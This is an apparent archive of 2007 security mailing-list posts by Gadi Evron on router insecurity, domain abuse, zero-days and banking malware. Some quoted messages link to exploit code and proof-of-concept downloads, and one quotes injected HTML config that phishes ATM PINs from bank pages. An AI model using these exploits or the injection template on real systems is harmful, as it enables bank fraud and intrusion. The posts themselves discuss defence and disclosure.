Andrew Fried (Treasury Department)
- Phishing and the IRS - New Methods

Danny McPherson (Arbor)
- TBA

Re: Broadband routers and botnets - being proactive

[Gadi Evron]

Fergie replied on NANOG to my recent post on the subject of broadband
routers insecurity:

> I'll even go a step further, and say that if ISPs keep punting
> on the whole botnet issue, and continue to think of themselves
> as 'common carriers' in some sense -- and continue to disengage
> on the issue -- then you may eventually forced to address those
> issues at some point in the not-so-distant future.
>
> I understand the financial disincentives, etc., but if the problem
> continues to grow and fester, and consumer (and financial institutions)
> losses grow larger, things may take a really ugly turn.

He is right, but I have a comment I felt it was important - to me - to
make. Not just on this particular vulnerability, but on the "war".

I must admit, vulnerabilities are endless and new exploitation vectors
will never end, even if it was possible and we were all 100% secure,
someone (an attacker rather than a vulnerability) will find a way to make
it 99% again for the right investment or with the right moment of
brilliance.

Enough with cheap philosophy though... as tired (even exhausted) as I am
of the endless repeating circle which security is, on all levels (from the
people involved through the interests involved all the way to the
same-old-FUD) I still haven't burned out, and I am still here.

The world isn't going to end tomorrow, and even if the Internet was to die
(which I doubt it will), we will survive. However, in the recent couple of
years a new community has been forming which we started refering to as
"Internet security operations". These folks, for various motives, work to
make the Internet stay up and become safer (actually being safe is a long
lost battle we should have never fought the way things were built).

With such a community being around, treating issues beyond our little
corner of the `net is possible to a level, and at least some progress is
made. Some anti virus engineers no longer care only about samples, some
network engineers no longer care only about their networks, etc.

Is any of this a solution? No. The problems themselves will not go away,
they aren't in any significant fashion currently being dealt with beyond
the tactical level of a fire brigade.

Is it the end than? Of course not. But operations vs. research are
determined by intelligence. As we have some intelligence, I can point to
yet another annoying vulnerability in the endless circle which those of us
who will want to, can study, and if they feel it is justified, defend
against. That is the broadband routers issue, which personally I'd really
rather avoid.

Unfortunately, this limited defense is what most of us can do at our own
homes, or tops as a volunteer fire brigade or neighborhood watch.

The Internet is the most disconnected global village I can imagine, but
we all have the funny uncle on another network and a weird one on yet
another. I sometimes feel that the old analogy of the Internet to the Wild
West is not quite it. Perhaps we are living in the Wild West, only if
instead of wastelands and small towns, we have New York city and the laws
of a feudal dark ages Kingdom.

Things will eventually change, and some of us will stick around to help
that change (or try to). For now though, it is about one vulnerability
ignored at a time, and working on our communities.

Gadi Evron.

Broadband routers and botnets - being proactive

[Gadi Evron]

In this post I'd like to discuss the threat widely circulated insecure
broadband routers pose today. We have touched on it before.

Today, yet another public report of a vulnerable DSL modem type was posted
to bugtraq, this time about a potential WIRELESS flaw with broadband
routers being insecure at Deutsche Telekom. I haven't verified this one
myself but it refers to "Deutsche Telekom Speedport w700v broadband
router":
http://seclists.org/bugtraq/2007/May/0178.html

If you all remember, there was another report a few months ago about a UK
ISP named BeThere with their wireless router being accessible from the
Internet and exploitable, as another example:
http://blogs.securiteam.com/index.php/archives/826

Two issues here:
1. Illegitimate access to broadband routers via wireless communication.
2. Illegitimate access to broadband routers via the WAN.

I'd like to discuss #2.

Some ISPs which provide such devices (as in the example of #2 above) use
them as bridges only, preventing several attack vectors (although not
all). Many others don't. Most broadband ISPs have a vulnerable user-base
on some level.

Many broadband ISPs around the world distribute such devices to their
clients.

Although the general risk is well known, like with many other security
issues many of us remained mostly quiet in the hope of avoiding massive
exploitation. As usual, we only delayed the inevitable. I fear that the
lack of awareness among some ISPs for this "not yet widely exploited
threat" has resulted in us not being PROACTIVE and taking action to secure
the Internet in this regard. What else is new, we are all busy with
yesterday's fires to worry about tomorrow's.
Good people will REACT and solve the problem when it pops up in
wide-exploitation, but what we may potentially be facing is yet another
vector for massive infections and the creation of eventual bot armies on
yet another platform.

My opinion is, that with all these public disclosures and a ripe pool of
potential victims, us delaying massive exploitation of this threat may not
last. I believe there is currently a window of opportunity for service
providers to act and secure their user-base without rushing. Nothing in
security is ever perfect, but actions such as changing default passwords
and preventing connections from the WAN to these devices would be a good
step to consider if you haven't already.

My suggestion would be to take a look at your infrastructure and what your
users use, and if you haven't already, add some security there. You
probably have a remote login option for your tech support staff which you
may want to explore - and secure. That's if things were not left at their
defaults.

Then, I'd also suggest scanning your network for what types of broadband
routers your users make use of, and how many of your clients have port 23
or 80 open. Whether you provide with the devices or not, many will be
using different ones set to default which may pose a similar threat. Being
aware of the current map of vulnerable devices of this type in your
networks can't hurt.

It is not often that we can predict which of the numerous threats out
there that we do not address currently, is going to become exploited
next. If you can spare the effort, I'd strongly urge you to explore this
front and be proactive on your own networks.

The previous unaddressed threat which most of us chose to ignore was
spoofing. We all knew of it for a very long time, but some of us believed
it did not pose a threat to the Internet or their networks for no other
reason than "it is not currently being exploited" and "there are enough
bots out there for spoofing to not be necessary". I still remember the
bitter argument I had with Randy Bush over that one. This is a rare
opportunity, let's not waste it.

We are all busy, but I hope some of you will have the time to look into
this.

I am aware of and have assisted several ISPs, who spent some time and
effort exploring this threat and in some cases acting on it. If anyone can
share their experience on dealing with securing their infrastructure in
this regard publicly, it would be much appreciated.

Thanks.

Gadi Evron.

RE: Defeating Citibank Virtual Keyboard protection using screenshot method

[Gadi Evron]

On Wed, 9 May 2007, Jim Harrison wrote:
> Without getting into SMTP latency comparisons...
> 
> Perhaps I missed something, but where is the threat demonstrated sans
> code installation?
> I'm not trying to disparage anyone's work, but as you yourself pointed
> out, there is nothing demonstrated here that doesn't qualify as common
> malware.

We are all really in agreement.

> 
> -----Original Message-
> From: Gadi Evron [mailto:[EMAIL PROTECTED] 
> Sent: Wednesday, May 09, 2007 1:42 PM
> To: Jim Harrison
> Cc: Int3; bugtraq@securityfocus.com
> Subject: RE: Defeating Citibank Virtual Keyboard protection using
> screenshot method
> 
> On Wed, 9 May 2007, Jim Harrison wrote:
> > Granted, it's an interesting methodology, but until you can
> demonstrate
> > circumvention of the CitiBank keylogger without installing code on the
> > victim host, a threat is not indicated and cannot be taken seriously.
> 
> Even though I was the first to point out this is old news for the
> malware
> scene in online/e fraud, I'd be the first to bow down before Int3 and
> say
> "thank you for sharing your work with us". Many don't.
> 
> But your point above:
> "without installing malware on the victim host"
> 
> Although true on some level, is bogus for the purpose of this work, as
> it
> being written makes an automatic assumtion on working only after malware
> is installed.
> 
> Although you are right, in practice this is already an heavily abused
> technology, and.. 
> 'Getting malware on a system', who ever heard of such a ridiculous
> idea? :)
> 
>   Gadi.
> 
> > 
> > -Original Message-
> > From: Int3 [mailto:[EMAIL PROTECTED] 
> > Sent: Wednesday, May 09, 2007 11:14 AM
> > To: Jim Harrison
> > Cc: bugtraq@securityfocus.com
> > Subject: Re: Defeating Citibank Virtual Keyboard protection using
> > screenshot method
> > 
> >  
> > This is not malware, it will only help people to experiment and see
> the
> > result without writing one for themself. 
> >  
> > Regards,
> > Yash K.S
> >  
> > On 5/9/07, Jim Harrison <[EMAIL PROTECTED]> wrote: 
> > 
> > (copied here without permission)
> > Step by Step Demo:
> > 
> > - Download POC from http://tracingbug.com/downloads/citihook.zip
> > <http://tracingbug.com/downloads/citihook.zip>  and
> > unzip to some directory
> > - Launch citihook.exe, this will watch only
> > https://www.online.citibank.co.in/ URL
> > 
> > Effectively, "Let me install my malware on your machine to
> > demonstrate
> > how vulnerable it is."
> > 
> > P-p-p-p-p-p-leeeze (three anti-social points for that quote)!
> > The "problem" ceases to be a vulnerability at this point. 
> > 
> > -Original Message-
> > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
> > Sent: Monday, May 07, 2007 3:03 AM
> > To: bugtraq@securityfocus.com <mailto:bugtraq@securityfocus.com>
> > 
> > Subject: Defeating Citibank Virtual Keyboard protection using
> > screenshot
> > method
> > 
> > Severity: Critical
> > 
> > Platforms Affected:
> > 
> > Microsoft Corporation: Windows 98 Any version 
> > Microsoft Corporation: Windows Me Any version
> > Microsoft Corporation: Windows XP Any version
> > Microsoft Corporation: Windows 2000 Any version
> > Microsoft Corporation: Windows 2003 Any version
> > Microsoft Corporation: Windows NT 4.0 Any version
> > Citi-Bank: Citi-Bank Virtual Keyboard Any version
> > 
> > Browsers:
> > Microsoft Internet Explorer Any version
> > Mozilla FireFox Any version
> > Any browser runs on Win32 platform ( With slight modification ) 
> > 
> > Original URL :
> > http://www.tracingbug.com/index.php/articles/view/23.html
> > 
> > Regards,
> > Yash K.S <[EMAIL PROTECTED] > | www.tracingbug.com
> > 
> > All mail to and from this domain is GFI-scanned.
> > 
> > 
> > 
> > 
> > 
> > All mail to and from this domain is GFI-scanned.
> > 
> 
> 
> All mail to and from this domain is GFI-scanned.
> 

RE: Defeating Citibank Virtual Keyboard protection using screenshot method

[Gadi Evron]

On Wed, 9 May 2007, Jim Harrison wrote:
> Granted, it's an interesting methodology, but until you can demonstrate
> circumvention of the CitiBank keylogger without installing code on the
> victim host, a threat is not indicated and cannot be taken seriously.

Even though I was the first to point out this is old news for the malware
scene in online/e fraud, I'd be the first to bow down before Int3 and say
"thank you for sharing your work with us". Many don't.

But your point above:
"without installing malware on the victim host"

Although true on some level, is bogus for the purpose of this work, as it
being written makes an automatic assumtion on working only after malware
is installed.

Although you are right, in practice this is already an heavily abused
technology, and.. 
'Getting malware on a system', who ever heard of such a ridiculous
idea? :)

Gadi.

> 
> -Original Message-
> From: Int3 [mailto:[EMAIL PROTECTED] 
> Sent: Wednesday, May 09, 2007 11:14 AM
> To: Jim Harrison
> Cc: bugtraq@securityfocus.com
> Subject: Re: Defeating Citibank Virtual Keyboard protection using
> screenshot method
> 
>  
> This is not malware, it will only help people to experiment and see the
> result without writing one for themself. 
>  
> Regards,
> Yash K.S
>  
> On 5/9/07, Jim Harrison <[EMAIL PROTECTED]> wrote: 
> 
>   (copied here without permission)
>   Step by Step Demo:
>   
>   - Download POC from http://tracingbug.com/downloads/citihook.zip
>   and
>   unzip to some directory
>   - Launch citihook.exe, this will watch only
>   https://www.online.citibank.co.in/ URL
>   
>   Effectively, "Let me install my malware on your machine to
> demonstrate
>   how vulnerable it is."
>   
>   P-p-p-p-p-p-leeeze (three anti-social points for that quote)!
>   The "problem" ceases to be a vulnerability at this point. 
>   
>   -Original Message-
>   From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
>   Sent: Monday, May 07, 2007 3:03 AM
>   To: bugtraq@securityfocus.com 
> 
>   Subject: Defeating Citibank Virtual Keyboard protection using
> screenshot
>   method
>   
>   Severity: Critical
>   
>   Platforms Affected:
>   
>   Microsoft Corporation: Windows 98 Any version 
>   Microsoft Corporation: Windows Me Any version
>   Microsoft Corporation: Windows XP Any version
>   Microsoft Corporation: Windows 2000 Any version
>   Microsoft Corporation: Windows 2003 Any version
>   Microsoft Corporation: Windows NT 4.0 Any version
>   Citi-Bank: Citi-Bank Virtual Keyboard Any version
>   
>   Browsers:
>   Microsoft Internet Explorer Any version
>   Mozilla FireFox Any version
>   Any browser runs on Win32 platform ( With slight modification ) 
>   
>   Original URL :
> http://www.tracingbug.com/index.php/articles/view/23.html
>   
>   Regards,
>   Yash K.S <[EMAIL PROTECTED] > | www.tracingbug.com
>   
>   All mail to and from this domain is GFI-scanned.
>   
>   
> 
> 
> 
> All mail to and from this domain is GFI-scanned.
> 

Re: Defeating Citibank Virtual Keyboard protection using screenshot method

[Gadi Evron]

On 7 May 2007 [EMAIL PROTECTED] wrote:
> Severity: Critical 

Erm, you do realize malware has been doing this for a long long time now,
right?

Virtual keyboards come as a solution for fighting one type of phishing and
one type alone. OCR or screenshots of mouse position on-click, for
example, are happening daily.

In most cases, it isn't really required to take screenshots:
http://blogs.securiteam.com/index.php/archives/678

Gadi.


> 
> Platforms Affected:
> 
> Microsoft Corporation: Windows 98 Any version 
> Microsoft Corporation: Windows Me Any version 
> Microsoft Corporation: Windows XP Any version
> Microsoft Corporation: Windows 2000 Any version 
> Microsoft Corporation: Windows 2003 Any version 
> Microsoft Corporation: Windows NT 4.0 Any version
> Citi-Bank: Citi-Bank Virtual Keyboard Any version 
> 
> Browsers:
> Microsoft Internet Explorer Any version
> Mozilla FireFox Any version
> Any browser runs on Win32 platform ( With slight modification )
> 
> Original URL : http://www.tracingbug.com/index.php/articles/view/23.html
> 
> Regards,
> Yash K.S <[EMAIL PROTECTED] > | www.tracingbug.com
> 

Re: [exploits] RPC vuln in DNS Server (fwd)

[Gadi Evron]

-- Forwarded message --
Date: Sat, 14 Apr 2007 18:40:53 +0200
From: Jerome Athias <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Re: [exploits] RPC vuln in DNS Server

Quote from HD Moore:

"This module has been added to the development version of Metasploit 3, it 
will be merged to 3.0-stable once 2003 support has been completed:

http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/dcerpc/msdns_zonename.rb

-HD"



Tyler Reguly a écrit :
> Greetings All,
>
> I figured I'd fire out an email and see if anyone has seen any other
> details on this besides what Microsoft/Secunia/Heise has published...
>
> I plan on look into it more this evening, but unfortunately I've gotta
> get through the work day first... I'll share anything I find tonight
> on the subject.
>
> Tyler
> Em. [EMAIL PROTECTED]
> Web. http://www.computerdefense.org
> ___
> exploits mailing list - in honour of rootshell
> Send an exploit: [EMAIL PROTECTED]
> http://whitestar.linuxbox.org/mailman/listinfo/exploits
>
>
>   
___
exploits mailing list - in honour of rootshell
Send an exploit: [EMAIL PROTECTED]
http://whitestar.linuxbox.org/mailman/listinfo/exploits

Re: Critical phpwiki c99shell exploit

[Gadi Evron]

On 12 Apr 2007 [EMAIL PROTECTED] wrote:
> Via the Phpwiki 1.3.x UpLoad feature some hackers from russia uploaded a php3 
> or php4 file,
> install a backdoor at port 8081 and have access to your whole disc and 
> overtake the server.
> 
> A url in the file is http://ccteam.ru/releases/c99shell
> 
> The uploaded file has a php, php3 or php4 extension and looks like a gif to 
> the mime magic.
> So apache usually accepts it.
> 
> To fix this phpwiki issue at first move the lib/plugin/UpLoad.php file out of 
> this directory.
> 
> You can fix it by adding those two lines to your list of disallowed 
> extensions:
>   php3
>   php4
> Currently only "php" is disallowed.
> 

This is a good best practice, but it doesn't hold water long
range. Further, where do you disallow these extensions? In the
application?

Mostly what the bad guys would do is upload, say.. .jpg, and then rename
it.

Gadi.

Re: 0day Oracle 10g exploit - dbms_aq.enqueue - become DBA

[Gadi Evron]

On Mon, 2 Apr 2007, Andrea "bunker" Purificato wrote:
> [0-day] Remote Oracle DBMS_AQ.ENQUEUE exploit (10g)

Not a 0day. Just publicly released exploit code.

This is:
1. Patched.
2. Not publicly exploitable.

Gadi.


> 
> Grant or revoke dba permission to unprivileged user
> Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
>
>   AUTHOR: Andrea "bunker" Purificato
>   http://rawlab.mindcreations.com
> 
>   DATE:   Mon Apr  2 11:54:22 CEST 2007
>  
>   PATCH:  
> http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html
>   (CVE-2007-0268 ?)
> 
> 
> You can find the evil code here: 
> http://rawlab.mindcreations.com/codes/exp/oracle/dbms_aq-enqueue.pl
> 
> 
> Regards,
> -- 
> Andrea "bunker" Purificato
> +++[>++>+>
> ++<<<-]>.>++.>.<--.>-.<+++.
> 
> http://rawlab.mindcreations.com 
> 

More information on ZERT patch for ANI 0day

[Gadi Evron]

Hi, more information about the patch released April 1st can be found here:

http://zert.isotf.org/

Including:
1. Technical information.
2. Why this patch was released when eeye already released a third party
patch.

The newly discovered zero-day vulnerability in the parsing of animated
cursors is very similar to the one previously discovered by eEye that was
patched by Microsoft in MS05-002. Basically an "anih" chunk in an animated
cursor RIFF file is read into a stack buffer of a fixed size (36
bytes) but the actual memory copy operation uses the length field provided
inside the "anih" chunk.giving an attacker an easy route to overflow the
stack and gain control of the execution of the process.

With the MS05-002 patch, Microsoft added a check for the length of the
chunk before copying it to the buffer. However, they neglected to audit
the rest of the code for any other instances of the vulnerable copy
routine. As it turns out, if there are two "anih" chunks in the file, the
second chunk will be handled by a separate piece of code which Microsoft
did not fix. This is what the authors of the zero-day discovered.

Although eEye has released a third-party patch that will prevent the
latest exploit from working, it doesn't fix the flawed copy routine. It
simply requires that any cursors loaded must reside within the Windows
directory (typically C:\WINDOWS\ or C:\WINNT\). This approach should
successfully mitigate most "drive-by's," but might be bypassed by an
attacker with access to this directory.

For this reason, ZERT is releasing a patch which addresses the core of the
vulnerability, by ensuring that no more than 36 bytes of an "anih" chunk
will be copied to the stack buffer, thus eliminating all potential exploit
paths while maintaining compatibility with well-formatted animated cursor
files. 

Gadi.

MS announces out-of-band patch for ANI 0day

[Gadi Evron]

http://blogs.technet.com/msrc/archive/2007/04/01/latest-on-security-update-for-microsoft-security-advisory-935423.aspx

Gadi.

On-going Internet Emergency and Domain Names

[Gadi Evron]

There is a current on-going Internet emergency: a critical 0day
vulnerability currently exploited in the wild threatens numerous desktop
systems which are being compromised and turned into bots, and the domain
names hosting it are a significant part of the reason why this attack has
not yet been mitigated.

This incident is currenly being handled by several operational groups.

This past February, I sent an email to the Reg-Ops (Registrar
Operations) mailing list. The email, which is quoted below, states how DNS
abuse (not the DNS infrastructure) is the biggest unmitigated current
vulnerability in day-to-day Internet security operations, not to mention
abuse.

While we argue about this or that TLD, there are operational issues of the
highest importance that are not being addressed.

The following is my original email message, elaborating on these above
statements. Please note this was indeed just an email message, sent among
friends.

- Begin quoted message -
Date: Fri, 16 Feb 2007 02:32:46 -0600 (CST)
From: Gadi Evron
To: [EMAIL PROTECTED]
Subject: [reg-ops] Internet security and domain names

Hi all, this is a tiny bit long. Please have patience, this is important.

On this list (which we maintain as low-traffic) you guys (the
registrars) have shown a lot of care and have become, on our sister
mitigation and research lists (those of you who are subscribed), an
integral part of our community we now call "The Internet Security
Operations Community".

We face problems today though, that you can not help us solve under the
current setting. But only you can help us coming up with new ideas.

Day-to-day, we are able to report hundreds and thousands of completely
bogus phishing and other bad domains, but both policy-wise and
resources-wise, registrars can't handle this. I don't blame you.

In emergencies, we can only mitigate threats if one of you or yours are in
control.. Just a week ago we faced the problem of the Dolphins stadium
being hacked and malicious code being put on it:

1. We tracked down all the IP addresses involved and mitigated them (by we
I mean also people other than me. Many were involved).
2. We helped the Dolphins Stadium IT staff take care of the malicious code
on their web page - Specifically Gary Warner).
3. We coordinated with law enforcement.
4. We coordinated that no one does a press release which will hurt law
enforcement.
5. We did a lot more. Including actually convincing a Chinese registrar to
pull one of the domains in question. A miracle. There was another domain
to be mitigated, unsuccessfully.

One thing though - at a second's notice, this could all be for nothing as
the DNS records could be updated with new IP addresses. There were
hundreds of other sites also infected.

Even if we could find the name server admin, some of these domains have as
many as 40 NSs. That doesn't make life easy. Then, these could change,
too.

This is the weakest link online today in Internet security, which we in
most cases can't mitigate, and the only mitigation route is the domain
name.

Every day we see two types of fast-flux attacks:
1. Those that keep changing A records by using a very low TTL.
2. Those that keep changing NS records, pretty much the same.

Now, if we have a domain which can be mitigated to solve such
emergencies and one of you happen to run it, that's great...
However, if we end up with a domain not under the care of you and
yours.. we are simply.. fucked. Sorry for the language.

ICANN has a lot of policy issues as well, and the good guys there can't
help. ICANN has enough trouble taking care of all those who want money for
.com, .net or .xxx.

All that being said, the current situation can not go on. We can no longer
ignore it nor are current measures sufficient. It is imperative that we
find some solutions, as limited as they may be.

We need to be able to get rid of domain names, at the very least during
real emergencies. I am aware how it isn't always easy to distinguish what
is good and what is bad. Still, we need to find a way.

Members of reg-ops:
What do you think can be conceivably done? How can we make a difference
which is REALLY needed on today's Internet?

Please participate and let me know what you think, we simply can no longer
wait for some magical change to happen.

   Gadi.
- End of quoted message -

Thousands of malicious domain names and several weeks later, we face the
current crisis. The 0day vulnerability is exploited in the wild, and
mitigating the IP addresses is not enough. We need to be able to "get
rid" of malicious domain names. We need to be able to mitigate attacks on
the weakest link - DNS, which are not necessarily solved by DNS-SEC or
Anycast.

On Reg-Ops and other operational groups, we came up with some imperfect
ideas on what we can make happen on our own in short term which will help
us reach better mitigation, as security does not seem to be on the 

Re: Firekeeper - IDS for Firefox available

[Gadi Evron]

On Sun, 11 Mar 2007, Jan Wrobel wrote:
> On Fri, 9 Mar 2007, Bob Beck wrote:
> 
> > * Jex <[EMAIL PROTECTED]> [2007-03-09 13:27]:
> > ...
> > > >rules similar to Snort ones to describe browser based attack
> > > >attempts.
> > > > All incoming HTTP and HTTPS traffic is scanned with these
> > > >rules. HTTPS and compressed responses are scanned after
> > > >decryption/decompression.
> > 
> > So the next snort style overflow/format string/etc bug from all that
> > string bashing code going on in the ids can now let the attacker
> > compromise a process with access to my https stream decrypted -
> > probably on an already convieniently open descriptor. Yeah. Baby.
> > 
> > "Web Browers are Bloated Fscking Monsters that are full of bugs"
> > 
> > "Lets add more code to look for people exploiting the bugs - of
> > course this code won't have bugs.."
> > 
> 
> Isn't it the case with every software created to add some protection
> to you computer? Firewalls, antiviruses, IDSes etc. are all adding
> code to your operating system that may, in the future, be found
> vulnerable to some attack. It is just the question whether protection
> they provide compensates additional threat they may introduce.

Guys, I agree. The guy created something very cool. Use it if you like,
otherwise, now that we understand the risks, let's move on.

I am not hoping to stop the general useless chatter (and I find it useful
for community development), I am hoping to thank the guy and make him feel
good about what he created.

Thank you for creating this.

> 
> Jan Wrobel
> 

Gadi.

--
"beepbeep it, i leave work, stop reading sec lists and im still hearing
gadi"
- HD Moore to Gadi Evron on IM, on Gadi's interview on npr, March 2007.

Re: Iframe-Cash/Iframe-Dollars Adware bundle...oooh... my ....god..

[Gadi Evron]

On Sun, 11 Mar 2007, Thierry Zoller wrote:
> Dear list,
> 
> Whoever deals with these poeple and thinks they are a benign Adware
> company (and thus spreads their bundles.

iframedollaz used to offer webmasters a deal to include code on their
website for cash per hit (drive-by install).

They have been doing a lot of other stuff, as well, such as breaking into
websites and "defacing" them. Read defacing as "leave them the same way
only add malicious code to install drive-by malware".

They are by far not the only ones, nor are these their only strategies.

Gadi.

> 
> Check this :
> Ignoring the fact that they basicaly  install a Rootkit, I attached a
> few files I reversed, they install a DLL that does not directly KEYLOG your
> banking data, but INJECTS HTML CODE into the _genuine_ (SSLed) Banking page
> asking you to enter more details (like PIN, Magic Password etc), then
> capture that data and transmit it (I did no further investigation)
> 
> http://secdev.zoller.lu/system32.zip
> Pass: 123
> 
> I am disgusted. They even created their own XML parser for this ...
> 
> An extract of HTML code they inject :
> -
>  url="wellsfargo" 
> before="name=userid autocomplete='off'>" 
> what="
> ATM PIN: id=pin  tabIndex=2 maxLength=4 type=password size=4 name=pin 
> autocomplete='off'>
> "
> block="alt=Go" 
> check="pin"
> quan="4"
> content="d"
> >
> 
> 
> 
> Attached the main files (pass 123), feel free to add this as HIPS or whatever
> signatures, those interested in a complete reversal can contact me
> to receive the EXE in question.
> 
> I have no more time feel free to dig deeper.
> 
> 
> I especialy liked this :
> 
>  url="citibank.com" 
> To prevent 
> fraud enter your credit card information please:
> 
> 
> Puke..
> 
> -- 
> http://secdev.zoller.lu
> Thierry Zoller
> 

month of PHP bugs, secondary message?

[Gadi Evron]

-
3. Are PHP applications also a target of this initiative?

No they are not. If you want a month of PHP application bugs you can
subscribe to the bugtraq or full-disclosure mailinglists.

-

http://www.php-security.org/

Gadi.

Know your Enemy: Web Application Threats

[Gadi Evron]

Jamie Riden, Ryan McGeehan, Brian Engert and Michael Mueter just released
an Honeynet paper on Web security called: Know your Enemy: Web
Application Threats

You can find their paper here:
http://honeynet.org/papers/webapp/

The paper is very good, and deals with all kinds of web threats such as
SQL Injection and XSS. Of most interest to me were the Code Injection and
Remote Code-Inclusion due to my own research in that field.
The Honeynet paper deals with many issues other than these, and
is most definitely recommended reading.

Jamie Riden has written a paper on web honey pots in the past. These guys
know what they are talking about.

Gadi.

Re: Re: Re: Solaris telnet vulnberability - how many on your network?

[Gadi Evron]

On 16 Feb 2007 [EMAIL PROTECTED] wrote:
> I believe in the early 90's there was a serious problem discovered in intel 
> chips that allowed certain standard code to be run to overflow programs 
> arbitrarily and gain access to operating systems in an administrative 
> capacity.
> 
> Also I remember the redhat (back in the day) repository being hacked and 
> backdoored versions of programs being put into it. I believe this also 
> happened to an early version of debian or fedora at some point also.
> 
> But I think you miss the point.
> 
> When they aren't preparing for security problems, the job of most security 
> professionals is to observe and react to these kinds of security problems.
> 
> The observer will exploit anything you are lax on. Discarding a security 
> concern because it doesn't seem important or of value to you is kinda stupid, 
> you should probably go find some other kind of work. Everything is important, 
> everything should be examined when and if possible. Thus the thread certainly 
> has merit.

As mentionedin reflections on trusting trust, you need to check
everything. Your code, the code of the OS loader, the OS, the compiler,
the mothrboard... etc.

Only, this is about trust, and at some point you need to say: resources
and threat wise, my risk stops here. It is a risk and therefore I am
taking chance.

You can't secure everything, but you definitely need to be aware of what
you do not secure.

As an example I like using, unrelated directly to coding, when building
secure networks with perimeters, people usually have two main choices on
one issue:

1. Secure the perimeter, everything inside it is secure.
2. Secure the perimeter, then secure what's inside.

There is no right or wrong, there is only what's right for you. The choice
is not always easy.

I'd normally strive for #2, but can't always choose it for obvious
reasons.

> It really makes me giddy when I see posts by trolls saying that security 
> through obscurity isn't really important, or that examining a possible act of 
> malice WITHIN one of the companies that is giving you software is not really 
> an important factor.

Security by obscurity works (although a lot more often when employed when
attacking, for the atatcking side protecting itself).

Security by obscurity is an amazing tool, but when used alone it is
useless, as when it is blown to bits, nothing remains to protect you. It
must be a part of your arsenal, not the sole defender.

> Even if it isn't an act of malice BY THEM, perhaps they have been hacked at 
> the very top levels of their software storage or their source code itself. 
> Perhaps something has gone wrong (what? no, couldn't be?).
> 
> Dismissing it is as stupid as dismissing the possibility that running some 
> unnamed, unknown executable on your windows box isn't a problem.
> 
> Scarey stuff. The job is to be paranoid. Not to be dismissive of those who 
> ARE.
> 
> TheFinn.
> 

[funsec] Quebec Health Officials Fighting Computer Virus (fwd)

[Gadi Evron]

-- Forwarded message --
Date: Thu, 15 Feb 2007 18:26:43 GMT
From: Fergie <[EMAIL PROTECTED]>
To: funsec@linuxbox.org
Subject: [funsec] Quebec Health Officials Fighting Computer Virus

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Via The Montreal Gazette (props, Flying Hamster).

[snip]

Quebec health officials are battling a fast-spreading virus that struck its
entire computer network system late Tuesday.

The virus ripped through computers at most health-care institutions,
affecting hospitals, CLSCs and nursing homes’ administrative activities
So far, it’s caused a province-wide slowdown and some fear that
patients’ files may have been damaged, too.

But government officials say patients’ privacy has not been compromised
and confidential information remains confidential.

The extent of the damage is not yet known, Isabelle Merizzi, press attache
to Health Minister Philippe Couillard said Wednesday.

[snip]

More:
http://www.canada.com/montrealgazette/news/story.html?id=388d592a-5e70-4e67
- -bb72-85f3b506b77a&k=74169

- - ferg

-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.5.3 (Build 5003)

wj8DBQFF1KXgq1pz9mNUZTMRAuC1AKDDocKzveHAwWwoXR+F38/bA9Jm4wCg85Ng
2PxcQlqEeLibcE1U/Z1bCqs=
=caJY
-END PGP SIGNATURE-


--
"Fergie", a.k.a. Paul Ferguson
 Engineering Architecture for the Internet
 fergdawg(at)netzero.net
 ferg's tech blog: http://fergdawg.blogspot.com/


___
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.

utorrent issue?

[Gadi Evron]

Hi, this did not hit bugtraq yet for some reason and it is serious. In AV
circles we are all worried about the abuse potential for this in malware.

uTorrent 1.6 build 474 (announce) Key Remote Heap Overflow Exploit
http://milw0rm.com/exploits/3296

Further Burak CIFTER wrote on this concern, comparing the utorrent
vulnerability to the SunOS one and how our security perceptions change:
http://blogs.securiteam.com/index.php/archives/825

Reflections on Trusting Trust [was: Re: Solaris telnet ...]

[Gadi Evron]

On Thu, 15 Feb 2007, Darren Reed wrote:
> How about putting a backdoor into your C compiler such that it
> generates "special code" when it recognises it is compiling
> /bin/login that allows special access?

Once every 2 years or so I have the chance of mailing in a reference to
the best security paper ever written (or one of the..). It is not just
about compilers, but about the most basic concept in security.

Reflections on Trusting Trust - Ken Thompson
http://www.acm.org/classics/sep95/

Gadi.

RE: defacements for the installation of malcode

[Gadi Evron]

On Wed, 14 Feb 2007, Jeremy Epstein wrote:
> There was also a really entertaining presentation from Patrick Petersen of
> IronPort at RSA, in which he mentioned use of defaced web sites as proxy
> forwarders for spammers.  According to the presentation, the spammers have a
> fairly sophisticated toolkit that takes over the site and turns it into a
> pharmacy (or whatever) redirect site.  A different goal from the Websense
> presentation, but still a purpose other than simple defacement.

Indeed. I can post some screenshots of some of these tools if you are
interested in them.

Anon remailers, spam tools, etc. More and more spam is being sent using
web servers.

I am looking for someone to volunteer to create spam assasin rules based
on how these tools send mail.

You can find my writeup and link to article on this subject here:
http://blogs.securiteam.com/index.php/archives/815

Gadi.

> 
> --Jeremy
> 
> > -Original Message-
> > From: Gadi Evron [mailto:[EMAIL PROTECTED] 
> > Sent: Monday, February 12, 2007 11:17 AM
> > To: [EMAIL PROTECTED]
> > Cc: botnets@whitestar.linuxbox.org; 
> > full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
> > Subject: defacements for the installation of malcode
> > 
> > Websense just released a blog post on how sites get defaced 
> > for malicious purposes other than the defacement itself, such 
> > as installing mallicious software on visiting users.
> > 
> > This is yet another layer of abuse of web server attack platforms.
> > 
> > You can find their post here:
> > http://www.websense.com/securitylabs/blog/blog.php?BlogID=109
> > 
> > Gadi.
> > 
> 

RE: Re[2]: Solaris telnet vulnberability - how many on your network?

[Gadi Evron]

On Wed, 14 Feb 2007, Roger A. Grimes wrote:
> Spectulation over whether Microsoft, Sun, or any other vendor
> intentionally put in backdoors just makes our industry seem
> unprofessional. The likelihood that either vendor did is near zero.

Although we ruled this out with Sun's full disclosure (almost completely,
never say 100% in security), no one was accusing Sun.

This is a very important issue: a backdoor does not need to be put there
by the builder.

Example: Linux kernel and two lines of code.

Gadi.

Re: Solaris telnet vulnberability - how many on your network?

[Gadi Evron]

On Thu, 15 Feb 2007, Damien Miller wrote:
